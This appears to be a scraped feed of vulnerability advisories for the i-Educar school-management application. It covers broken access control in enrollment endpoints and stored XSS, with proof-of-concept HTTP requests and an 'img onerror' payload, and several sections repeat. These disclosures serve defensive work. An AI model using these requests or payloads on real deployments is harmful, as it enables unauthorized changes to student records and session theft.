>https://www.cve.org/CVERecord?id=CVE-2025-10608</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/enrollment-history/[ID]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /enrollment-history/[ID]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-10608/image.png" width="1439" height="663" srcset="/p/cve-2025-10608/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10608/image_hu_ecdded4f672254a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="217" data-flex-basis="520px" /></p> <p><img src="/p/cve-2025-10608/image-1.png" width="936" height="436" srcset="/p/cve-2025-10608/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10608/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /enrollment-history/206 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/intranet/educar_matricula_det.php?cod_matricula=206 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=[low_privileged cookie] </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function to sign students from classes. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-10608/image-2.png" width="1617" height="702" srcset="/p/cve-2025-10608/image-2_hu_2bddda474495b951.png 480w, /p/cve-2025-10608/image-2_hu_ff39a09242bf73ba.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="230" data-flex-basis="552px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10608.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10372/ https://www.cvehunters.com/p/cve-2025-10372/ <h2 id="cve-2025-10372-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_modulo_cadphp">CVE-2025-10372: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_modulo_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10372" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10372</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_modulo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_modulo_cad.php</code></p><h2 id="cve-2025-10372-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_modulo_cadphp">CVE-2025-10372: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_modulo_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10372" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10372</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_modulo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> and <code>descricao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_modulo_cad.php</code></p> <p>Parameters: <code>nm_tipo</code> and <code>descricao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_tipo</code> and <code>descricao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10372/image.png" width="583" height="230" srcset="/p/cve-2025-10372/image_hu_11b4ec969d3cf5a8.png 480w, /p/cve-2025-10372/image_hu_280822500865c396.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="253" data-flex-basis="608px" /></p> <p><img src="/p/cve-2025-10372/image-1.png" width="572" height="231" srcset="/p/cve-2025-10372/image-1_hu_372cc54d6686bae9.png 480w, /p/cve-2025-10372/image-1_hu_69fa88ac3e05bf85.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="247" data-flex-basis="594px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10372.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 13 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10373/ https://www.cvehunters.com/p/cve-2025-10373/ <h2 id="cve-2025-10373-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_cadphp-parameter-nm_tipo">CVE-2025-10373: Cross-Site Scripting (XSS) Stored endpoint <code>educar_turma_tipo_cad.php</code> parameter <code>nm_tipo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10373" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10373</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_turma_tipo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_turma_tipo_cad.php</code></p><h2 id="cve-2025-10373-cross-site-scripting-xss-stored-endpoint-educar_turma_tipo_cadphp-parameter-nm_tipo">CVE-2025-10373: Cross-Site Scripting (XSS) Stored endpoint <code>educar_turma_tipo_cad.php</code> parameter <code>nm_tipo</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10373" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10373</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Stored Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_turma_tipo_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>nm_tipo</code> parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_turma_tipo_cad.php</code></p> <p>Parameter: <code>nm_tipo</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>nm_tipo</code> parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert('CVE-Hunters')</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10373/image.png" width="560" height="214" srcset="/p/cve-2025-10373/image_hu_74dab14fb73dfe41.png 480w, /p/cve-2025-10373/image_hu_76923e2a7dc46c82.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="628px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md" target="_blank" rel="noopener" >https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/i-Educar/CVE-2025-10373.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/karina50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/karina-gante/" target="_blank" rel="noopener" >Karina Gante</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sat, 13 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10070/ https://www.cvehunters.com/p/cve-2025-10070/ <h2 id="cve-2025-10070-broken-access-control-in-enturmacao-em-loteid-endpoint">CVE-2025-10070: Broken Access Control in <code>/enturmacao-em-lote/[ID]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10070" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10070</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/enturmacao-em-lote/[ID]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /enturmacao-em-lote/[ID]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-10070-broken-access-control-in-enturmacao-em-loteid-endpoint">CVE-2025-10070: Broken Access Control in <code>/enturmacao-em-lote/[ID]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10070" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10070</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/enturmacao-em-lote/[ID]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /enturmacao-em-lote/[ID]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-10070/image.png" width="1843" height="533" srcset="/p/cve-2025-10070/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10070/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10070/image-1.png" width="936" height="436" srcset="/p/cve-2025-10070/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10070/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /enturmacao-em-lote/15 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: none </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function to batch assign students to classes. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-10070/image-2.png" width="1556" height="667" srcset="/p/cve-2025-10070/image-2_hu_9bc692092386d63c.png 480w, /p/cve-2025-10070/image-2_hu_8c43eda558b10780.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="233" data-flex-basis="559px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10070.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10071/ https://www.cvehunters.com/p/cve-2025-10071/ <h2 id="cve-2025-10071-broken-access-control-in-cancelar-enturmacao-em-loteid-endpoint">CVE-2025-10071: Broken Access Control in <code>/cancelar-enturmacao-em-lote/[ID]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10071" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10071</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/cancelar-enturmacao-em-lote/[ID]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /cancelar-enturmacao-em-lote/[ID]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-10071-broken-access-control-in-cancelar-enturmacao-em-loteid-endpoint">CVE-2025-10071: Broken Access Control in <code>/cancelar-enturmacao-em-lote/[ID]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10071" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10071</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/cancelar-enturmacao-em-lote/[ID]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /cancelar-enturmacao-em-lote/[ID]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-10071/image.png" width="1843" height="533" srcset="/p/cve-2025-10071/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10071/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10071/image-1.png" width="936" height="436" srcset="/p/cve-2025-10071/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10071/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /cancelar-enturmacao-em-lote/15 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/enturmacao-em-lote/15 </span></span><span class="line"><span class="cl">Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl">Priority: u=0, i </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"><ul><li>We could observe that we have access to the page and to the function to batch unassign students from classes. And, this user, should not do that.</li></ul></p> <p><img src="/p/cve-2025-10071/image-2.png" width="1573" height="669" srcset="/p/cve-2025-10071/image-2_hu_c622a1c3b8276d3c.png 480w, /p/cve-2025-10071/image-2_hu_f4790faff4a3d16.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="235" data-flex-basis="564px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">Broken Access Control vulnerabilities can have severe consequences, including: <ul> <li>Unauthorized access to restricted functionality;</li> <li>Escalation of privileges for low-level users;</li> <li>Exposure of sensitive data and potential system compromise;</li> <li>Loss of confidentiality and integrity of educational records;</li> <li>Reputational damage to the organization.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10071.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Sun, 07 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10072/ https://www.cvehunters.com/p/cve-2025-10072/ <h2 id="cve-2025-10072-broken-access-control-in-matriculaid_studententurmarid_class-endpoint">CVE-2025-10072: Broken Access Control in <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10072" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10072</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-10072-broken-access-control-in-matriculaid_studententurmarid_class-endpoint">CVE-2025-10072: Broken Access Control in <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10072" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10072</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /matricula/[ID_STUDENT]/enturmar/[ID_CLASS]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user.</li></ul></p> <p><img src="/p/cve-2025-10072/image.png" width="1843" height="533" srcset="/p/cve-2025-10072/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10072/image_hu_deb570b2049417e1.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="345" data-flex-basis="829px" /></p> <p><img src="/p/cve-2025-10072/image-1.png" width="936" height="436" srcset="/p/cve-2025-10072/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10072/image-1_hu_f205df0666d7bd3a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="214" data-flex-basis="515px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">GET /matricula/206/enturmar/23 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: 